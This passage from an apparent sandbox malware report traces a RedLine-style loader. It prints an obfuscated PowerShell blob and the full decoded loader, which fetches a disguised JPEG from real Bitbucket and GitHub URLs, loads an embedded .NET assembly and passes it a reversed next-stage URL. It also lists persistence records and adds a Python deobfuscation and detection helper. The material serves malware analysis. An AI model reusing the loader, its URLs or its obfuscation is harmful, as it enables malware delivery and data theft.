I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#HM#a#Bp#GU#b#Bk#GE#Z#Bh#HM#LwBn#HM#Z#Bn#Gg#agBq#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/shieldadas/gsdghjj/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
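The Process created records above, together with the AMSI capture, document the whole loader chain. wscript.exe (the CLSID it queried earlier, {B54F3741-5B07-11cf-A4B0-00AA004A55E8}, is the VBScript engine, so the dropped script is VBScript) starts powershell.exe with a $codigo string that is base64 of UTF-16LE PowerShell source in which every 'A' has been replaced by '#'; that is what the Base64 Encoded PowerShell Command and FromBase64String Sigma rules are seeing. The decoded script, visible in the second record, forces TLS 1.2, fetches img_test.jpg from Bitbucket or GitHub in random order, carves the text between <<BASE64_START>> and <<BASE64_END>>, loads the result as a .NET assembly with Assembly.Load, and invokes testpowershell.Home.la with the next-stage URL written backwards (the Reversed Commands Sigma hit) and the host process name RegAsm, which lines up with the RegAsm.exe injection and RedLine records elsewhere in this report. The Python below is an added example written for this page, not code from the report or from the sample. It reproduces those three transformations on inputs copied from the records (the first 72 characters of $codigo and the reversed argument) and on a constructed fake image. The '#'-for-'A' substitution is inferred from the fact that undoing it yields exactly the script in the second record; what Home.la does with its remaining arguments is not shown on the page and is not assumed here.

```python
import base64
import re
from typing import Optional

# Constructed sample inputs, copied from the records above: the first 72
# characters of $codigo and the reversed argument passed to Home.la.
CODIGO_PREFIX = "WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#"
REVERSED_ARG = "txt.52liw/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth"

START_FLAG = b"<<BASE64_START>>"
END_FLAG = b"<<BASE64_END>>"

# Constructed fake "image": a JPEG-looking prefix, then the two markers around
# a base64 blob. In the real img_test.jpg that slot holds a .NET assembly.
FAKE_IMAGE = (
    b"\xff\xd8\xff\xe0 not really a picture "
    + START_FLAG + base64.b64encode(b"MZ\x90\x00 pretend assembly") + END_FLAG
    + b" trailing junk"
)


def looks_like_codigo(text: str) -> bool:
    """Cheap pre-filter for this encoding: base64 alphabet plus '#', no 'A' at all.
    Base64 of UTF-16LE text is full of 'A' (every other byte is zero), so a long
    run with zero 'A' and many '#' is the tell."""
    return (
        "#" in text
        and re.fullmatch(r"[B-Za-z0-9+/=#]+", text) is not None
        and text.count("#") >= len(text) // 8
    )


def deobfuscate_codigo(blob: str, placeholder: str = "#") -> str:
    """Undo $codigo: put 'A' back for '#', base64-decode, read as UTF-16LE."""
    restored = blob.replace(placeholder, "A")
    # The AMSI capture is truncated mid-string; drop any dangling partial group.
    restored = restored[: len(restored) - len(restored) % 4]
    return base64.b64decode(restored).decode("utf-16-le", errors="replace")


def reverse_c2_argument(arg: str) -> str:
    """The loader hands Home.la its next-stage URL backwards; this turns it round."""
    return arg[::-1]


def extract_marked_payload(image: bytes) -> Optional[bytes]:
    """Mirror the carving step of the decoded script: take the bytes between the
    two markers and base64-decode them. Returns None when the markers are missing
    or out of order, exactly as the script's -ge 0 / -gt checks do."""
    start = image.find(START_FLAG)
    end = image.find(END_FLAG)
    if start < 0 or end <= start:
        return None
    return base64.b64decode(image[start + len(START_FLAG):end])


if __name__ == "__main__":
    print(deobfuscate_codigo(CODIGO_PREFIX))
    print(reverse_c2_argument(REVERSED_ARG))
    print(extract_marked_payload(FAKE_IMAGE))
```

Feed the full $codigo value (everything inside the single quotes) to deobfuscate_codigo to recover the complete script; looks_like_codigo is meant to run over command lines and AMSI events before decoding, and extract_marked_payload over a saved copy of img_test.jpg to pull the stage-two assembly for analysis without executing it.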
                  Source: sRMytgfRpJ.exe Static PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe Code function: 0_2_00007FF7D6FD1D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF7D6FD1D28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_068ADFD1 push es; ret 10_2_068ADFE6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_068AC711 push es; ret 10_2_068AC720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_068AD412 push es; ret 10_2_068AD420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_068AE060 push es; ret 10_2_068AE070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_068AECF2 push eax; ret 10_2_068AED01

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe  Code function: 0_2_00007FF7D6FD1684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF7D6FD1684
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exe  Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
